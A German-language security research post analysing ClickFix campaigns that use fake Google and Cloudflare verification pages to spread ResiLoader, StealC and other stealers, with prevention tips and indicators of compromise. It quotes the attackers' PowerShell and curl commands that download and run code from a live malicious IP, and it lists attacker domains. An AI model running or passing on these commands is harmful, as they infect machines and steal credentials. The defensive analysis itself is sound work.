ClickFix-Angriffe, bei denen Nutzer dazu verleitet werden, selbst schädliche Befehle auszuführen, entwickeln sich ständig weiter. Bei dieser neuesten Kampagne werden gefälschte Verifizierungsseiten von Google und Cloudflare verwendet, um die Opfer dazu zu bringen, ihre eigenen Geräte zu infizieren.
Schon ein einziger Fehler kann dazu führen, dass Malware installiert wird, die Passwörter und andere sensible Daten stiehlt, Angreifern Fernzugriff auf Ihren Computer gewährt oder weitere Malware herunterlädt, die die vollständige Kontrolle über Ihr System übernehmen kann.
Wir haben mehrere Kampagnen aufgedeckt, bei denen dieselbe Infrastruktur zur Verbreitung von Malware genutzt wurde, darunter HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport und ein auf Rust basierender Stealer.
In einer Infektionskette lädt eine mit einem Trojaner versehene Version der legitimen Messaging-App „Franz“ einen bislang nicht dokumentierten Loader namens „ResiLoader“ herunter, der die Sicherheitssoftware deaktiviert, bevor er den Infostealer „StealC“ einsetzt.
Bevor wir uns mit den technischen Details befassen, erfahren Sie hier, wie Sie vermeiden können, das nächste Opfer zu werden.
Wie man sicher bleibt
ClickFix-Angriffe basieren darauf, Sie dazu zu bringen, Befehle selbst auszuführen. Der sicherste Ansatz ist ganz einfach:
- Kopieren und führen Sie niemals Befehle von einer Website aus, es sei denn, Sie befolgen Anweisungen aus einer vertrauenswürdigen Quelle und wissen genau, was der Befehl bewirkt.
- Seien Sie vorsichtig bei Verifizierungsseiten. Google, Cloudflare, Microsoft und andere seriöse Dienste werden Sie niemals auffordern, PowerShell-Befehle in Windows einzufügen, Windows beweisen, dass Sie ein Mensch sind, oder um ein Problem zu beheben.
- Lassen Sie sich nicht von der Dringlichkeit unter Druck setzen. Gefälschte Verifizierungsseiten nutzen oft Countdown-Timer, Besucherzähler oder Warnmeldungen, um Sie zu einem schnellen Handeln zu drängen.
- Halten Sie Ihre Sicherheitssoftware auf dem neuesten Stand. Echtzeitschutz und Webschutz können dazu beitragen, schädliche Websites zu blockieren, bevor Sie diese aufrufen.
- Hinterfragen Sie unerwartete technische Anweisungen. Wenn Sie auf einer Website aufgefordert werden, PowerShell, die Eingabeaufforderung oder das Terminal zu öffnen, halten Sie inne und überprüfen Sie die Anweisungen über die offiziellen Supportkanäle des Unternehmens.
Profi-Tipp: Malwarebytes Browser Guard kann Sie warnen, wenn eine Website versucht, Inhalte in Ihre Zwischenablage zu kopieren – ein gängiger Trick, der von ClickFix-Seiten verwendet wird.
Technische Analyse
Die in dieser Untersuchung analysierten Kampagnen sind seit mindestens Ende 2025 aktiv und nutzen eine Vielzahl gefälschter Google- und Cloudflare-Seiten, um Malware zu verbreiten. Obwohl sich die Köder unterscheiden, basieren sie größtenteils auf derselben Infrastruktur und Infektionskette, wobei die Angreifer kontinuierlich neue Verbreitungsmethoden und Payloads testen.
Verschiedene Köder, ein Ziel
Die meisten Kampagnen weisen mehrere Gemeinsamkeiten auf:
- Verwendung des Ordners
C:\ProgramData\Zoomsum spätere Phasen zu extrahieren - PowerShell-ClickFix-Befehle, die ähnlichen Mustern folgen
- Verwendung von Cloudflare-R2-Buckets zur Bereitstellung von Nutzdaten
- Von ASN Dedik Services Limited gehostete IP-Adressen
- HTML-Antworten, die ausschließlich den Ausdruck
"hehe"
Diese Indikatoren haben sich im Laufe der Zeit verändert, sodass sie nicht in jeder Infektionskette vorkommen. Die Kampagnen entwickeln sich ständig weiter, wobei regelmäßig neue Payloads und Verbreitungsmethoden eingeführt werden. So wird beispielsweise in einigen Fällen die IP-Adresse anstelle von Buckets direkt für die Verbreitung der Payloads genutzt.
Der vom Benutzer kopierte endgültige Befehl entspricht in der Regel diesem Muster:
powershell -c “iex(irm ‘{IP}:{Port}/{Random Path}’ -UseBasicParsing)”
Der Port und der Pfad sind in den analysierten Fällen nicht immer vorhanden; die Ports sind zufällig, aber einige der verwendeten Ports sind: 6600, 9900, 5506, 7895, 7493, 149, 8442.
Zur Ausführung dieser Befehle werden mehrere ClickFix-bezogene Vorlagen verwendet, die hauptsächlich mit Google und Cloudflare in Zusammenhang stehen. Wir haben außerdem festgestellt, dass der PowerShell-Befehl in einigen Fällen über das IClickFix-Framework verbreitet wurde.
Wir haben festgestellt, dass diese ClickFix-Kampagnen über folgende Kanäle verbreitet wurden:
- Alte Websites, deren Laufzeit wahrscheinlich abgelaufen ist und die von dem/den Täter(n) zurückgekauft wurden.
- CloudFlare Pages (
.pages.devDomains). - Gehackte Websites.
- Gefälschte Dienste, beispielsweise im Zusammenhang mit QR-Codes oder dem Zugriff auf Dateien im Internet.
Google ClickFix lockt
Die Verantwortlichen hinter diesen Kampagnen nutzen verschiedene Google-bezogene HTML-Seiten und -Kits.
Ein Köder täuscht eine Google-reCAPTCHA-Verifizierung vor. Die Seiten werden unter zufälligen URLs gehostet, die gefälschte oder schädliche Inhalte anzeigen. Bei diesen Domains handelt es sich oft um ältere Registrierungen, die seit Kurzem auf neue IP-Adressen verweisen, was darauf hindeutet, dass sie für diese Kampagne umfunktioniert wurden.
Einige dieser Seiten enthalten URL-Parameter wie beispielsweise „zoneid“, „cost“, „device“, „country“ und „clickid“, zum Beispiel:
/conf/captcha.html?zoneid=10420852/wincapbot/nobot.html/xmr/trkuste.php?zone=5327134bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop


In diesem Fall sind die Funktionen im Zusammenhang mit ClickFix in der Klasse implementiert CustomCaptcha. Der Befehl liegt im Klartext vor, ohne jegliche Verschleierung.

Eine weitere Bereitstellungsmethode nutzt Cloudflare Pages, das auf .pages.dev Subdomains.

In diesem Fall wird die HTML-Seite verschleiert, indem mehrere Variablen deklariert und mit einer XOR-Verschlüsselung versehen werden. Der entschlüsselte Code heißt SECURITY GATEWAY und es setzt sich aus den Funktionen zusammen GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenControllerund PanelController.
Der Code ermöglicht es den Angreifern, den Befehl entweder aus der Ferne oder lokal abzurufen. In diesem Beispiel ist der schädliche PowerShell-Befehl lokal gespeichert.

Wir haben außerdem festgestellt, dass einige dieser Domains in der Vergangenheit bereits einen anderen Köder verbreitet haben, der in diesem Fall mit einer nicht autorisierten Google-Anmeldung in Verbindung stand. Bei diesem ClickFix-Köder wird der Nutzer aufgefordert, den schädlichen Befehl zu kopieren und einzufügen, um sein Gerät als primäres Gerät festzulegen.

Das Interessante an diesem ClickFix-Kit ist, dass es, wie in den Kommentaren beschrieben, über eine „Genehmigungsschranke“ verfügt und dass der Angreifer manuell aus der Liste auswählen muss, welchen Befehl der Benutzer ausführen soll.


In jüngeren Kampagnen haben wir einen ClickFix-Köder im Zusammenhang mit Google Meet entdeckt, bei dem ein bösartiger Befehl kopiert und eingefügt werden muss, um Audio-Probleme zu beheben.

In den analysierten Fällen war der Endpunkt /api/driver-clipboard.php gab den folgenden schädlichen Befehl zurück:
{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""}
Sonstige Köder
Die Drahtzieher dieser Kampagne nutzen verschiedene Tools und Köder, die größtenteils mit Google in Verbindung stehen. Wir haben jedoch auch andere Köder entdeckt, die Befehle kopiert haben, die mit derselben Infrastruktur in Zusammenhang stehen.
Die Angreifer hinter diesen Kampagnen kompromittieren zudem mehrere Websites, wobei sie verschiedene Vorlagen im Zusammenhang mit dem CloudFlare-ClickFix-Köder verwenden.


Wir haben mehrere Vorlagen identifiziert, die für CloudFlare-Seiten verwendet werden. Der Befehl liegt in den analysierten Fällen im Klartext vor oder ist in einigen Fällen verschleiert.



Wir haben außerdem einige speziell erstellte Websites mit gefälschten Diensten entdeckt. So zeigt beispielsweise die Website „My QR Generator“ einen verschleierten QR-Code an und fordert den Nutzer auf, einen PowerShell-Befehl auszuführen, um zu bestätigen, dass er kein Roboter ist.

In diesem Fall ist der Befehl in Base-64 kodiert:

PowerShell-Downloader
Der vom Benutzer ausgeführte Befehl „ClickFix“ entschlüsselt ein Skript und speichert es unter dem Namen tmp{4 char}.tmp.ps1.
Wir haben mehrere Varianten dieses Skripts entdeckt, doch die neuesten Versionen verhalten sich wie folgt:
- Erstellen Sie den Ordner
C:\ProgramData\Zooms. - Laden Sie die nächste Stufe aus einem CloudFlare-Bucket herunter und speichern Sie sie in
C:\ProgramData\Zooms. In einigen Varianten des Skripts wird die nächste Stufe direkt von einer IP-Adresse heruntergeladen. - Senden Sie die Informationen zum betroffenen Rechner an
http://{IP}/dl-callback. In einigen Varianten des Drehbuchs fehlt dieser Teil.

Die Angreifer hinter diesen Kampagnen setzen eine Vielzahl unterschiedlicher Payloads ein. Die Kampagnen verbreiten eine breite Palette an Payloads. Die folgende Tabelle fasst einige der heruntergeladenen Dateinamen und die dadurch installierte Malware zusammen. In vielen der analysierten Fälle wurde die endgültige Payload über DLL-Hijacking verbreitet, wie wir später auch beim StealC-Stealer sehen werden.
| Datei verteilt | Verbreitung von Malware |
libEGL.zip, Safe-1.zip | Mit Trojanern infizierte Electron-App, ResiLoader und StealC |
Test.msi | Deno Loader und PowerShell Stealer |
arworks.zip | Amatera Stealer |
water-night.zip | Remus Stealer |
Setup.msi, Invintrum_first.msi | NetSupport |
traffic1.msi | CastleLoader |
ibrowser.exe | Rostdieb |
Wir haben einen neuen Loader namens „ResiLoader“ analysiert, der letztendlich „StealC“ verbreitet. Außerdem haben wir festgestellt, dass der Angreifer in den jüngsten Kampagnen mittlerweile Deno einsetzt, um am Ende einen in PowerShell entwickelten Stealer zu verbreiten; die Analyse dieser Infektionskette könnte Gegenstand eines zukünftigen Blogbeitrags sein.
Die mit einem Trojaner infizierte Electron-App lädt ResiLoader herunter
In diesem Fall wurde die ZIP-Datei von folgender Adresse heruntergeladen:
pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip
Nach der Extraktion in:
C:\ProgramData\Zooms\libEGL.zip_ext
Die ZIP-Datei enthält eine mit einem Trojaner infizierte Version der Open-Source-Messaging-App „Franz“:

Der Schadcode ist in der index.js Datei:

Der Downloader führt die folgenden Vorgänge aus:
- Dekodiere die Zeichenfolgen mit der Funktion
HC(). - Lesevorgänge
readme.txt, erwartet einen Kampagnenschlüssel der FormAAAA-BBBB, gibt ihn als Array von Tokens zurück. In diesem Fall lautet der Nameresiloader-1Und deshalb nennen wir die heruntergeladene DLL „ResiLoader“. - Lesevorgänge
%APPDATA%\setup.txt; falls nicht vorhanden, wird eine zufällige Zeichenkette mit 8 Zeichen generiert und gespeichert. - Persistenz erreichen mithilfe von
app.setLoginItemSettings. - Sendet eine POST-Anfrage an
https[:]//completstep[.]com/api/und die JSON-Antwort aufbereiten- Wenn
task.eist vorhanden, wird es ausgeführteval(task.e); dadurch kann der Angreifer beliebigen JavaScript-Code ausführen. - Wenn
task.filesist vorhanden, erstellen%TEMP%\<Date.now()>\, jede Datei entschlüsseln und schreiben; falls ein Dateiname auf.exe, führen Sie es überchild_process.exec.
- Wenn
In unserem Fall haben wir eine ZIP-Datei erhalten, die ein DLL-Hijacking von ssh-add.exe:
{"task":{"name":"JUNE18USY","files":{
"msys-2.0.dll":"<base64>",
"msys-crypto-3.dll":"<base64>",
"msys-gcc_s-seh-1.dll":"<base64>",
"ssh-add.exe":"<base64>" }}}
Anschließend wurde die ausführbare Datei mit folgendem Befehl ausgeführt:
C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe""
ResiLoader
Die msys-crypto-3.dll ist ein verschleierter .NET NativeAOT loader der eine AV/EDR-Umgehung mithilfe einer BYOD-Technik implementiert, Persistenz erlangt und schließlich den Stealer „StealC“ lädt. Wir konnten keine konkrete Zuordnung für diesen Loader finden und haben ihn daher auf Grundlage der in früheren Versionen vorhandenen Zeichenfolge „ResiLoader“ genannt. readme.txt.
Der Loader enthält mehrere Zeichenfolgen, von denen einige im Klartext und andere verschlüsselt vorliegen. Nach der Entschlüsselung der Zeichenfolgen lässt sich ein vollständiges Bild von der Funktionsweise des ResiLoaders gewinnen.
MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=
Der Lader führt die folgenden Vorgänge aus:
- Extrahieren Sie den kodierten Blob, der zwei Nutzdaten enthält, indem Sie den Marker auslesen
AtLorenBasesowie die Länge des verschlüsselten Blobs. Anschließend decodiert es den Blob und entschlüsselt den Treiberpcdhost.sys(OPSWAT
(AppRemover-Treiber) und die StealC-Nutzlast mithilfe eines benutzerdefinierten Entschlüsselungsalgorithmus. - Beenden Sie mithilfe des entfernten Treibers mehr als 140 Prozesse, die mit EDR-/AV-Prozessen in Verbindung stehen.
- UAC-Umgehung durchführen über
ICMLuaUtilErweiterte COM-Schnittstelle. - Ordner erstellen
C:\ProgramData\Google Update, sich selbst kopieren; Persistenz mithilfe des RUN-Registrierungsschlüssels hinzufügen cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe
Schließlich führt der Loader das „Process Hollowing“ des Prozesses durch ServiceModelReg.exe um den StealC-Stealer auszuführen.
IOCs
Hash
72907d0ca3258365838626f6a8d993a6: ResiLoader-DLL
0234E3188F2883A438B3F2BEAB7A78B2: StealC
6a9ac6b3fff7b695dbd4df6ff7f6c516: Remus
206ce339febca0c3bcc850f42595fc63: Amatera Stealer
eee416efcb1e33f220cdb4b05496a07a: NetSupport RAT
b8d53740024d126cb55f83854335a4ab: Rostdieb
Domänen
ClickFix-Seiten verteilen:
onegeekworld[.]com
thefirmos[.]com
antibotv3[.]com
centralwildcats[.]com
cloud.antibotv3[.]com
cloudautosolutions[.]com
sunseekersupply[.]com
123clocks[.]com
orcanegames[.]com
rwmonitoring[.]com
100furniture[.]com
nepalcharchaa[.]com
p-floribunds.pages[.]dev
pg-altirade2.pages[.]dev
pg-cordivant-m6.pages[.]dev
g-luminence.pages[.]dev
generator-qrcode[.]online
regdev-google[.]com
khosla[.]capital
eorgke09054909j[.]com
dropboxi[.]com
Für die Verteilung der Nutzdaten verwendete CloudFlare-Buckets:
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-620528e2dc874e16937673265aa23d39.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
pub-9682d5896df841679c5a17eb41273f89.r2[.]dev
pub-18d99d0d18b94e85824c1cc4d5b5c637.r2[.]dev
pub-0170eabb9df346bd822f863b7c3946e3.r2[.]dev
pub-4ed7b8ecee744dea930d74ba4ac74285.r2[.]dev
unitedstateverif[.]com: Verteilung der Nutzlast
bigflaredefence[.]com: Verteilung der Nutzlast
popularcard[.]shop: Rust Stealer C2
xzz[.]proxygrid[.]cc: Amatera Stealer C2
completstep[.]com: Loader C2
eventlogerps1[.]ink: Deno Loader
be231ro963[.]com: Deno Loader
IPs
Für die Verteilung der Nutzdaten verwendete IP-Adresse:
151.240.151[.]126
85.239.149[.]16
85.239.149[.]40
93.152.224[.]29
151.240.151[.]46
93.152.224[.]167
85.239.149[.]78
192.69.195[.]131
135.181.171[.]40
94.26.83[.]206
91.92.34[.]128
85.239.144[.]31
93.152.224[.]39
94.26.90[.]112
146.19.248[.]120: StealC C2
Danksagungen
- Gemeldete verwandte Domain: https://x.com/stop_spammerz/status/2070152741037477960
- Gemeldete verwandte Domain: https://x.com/Yuki27183/status/2047354005605777850
- Auf Reddit gemeldeter Infektionsfall bei einem Nutzer: https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/
- Mögliche damit zusammenhängende Infektionskette https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026




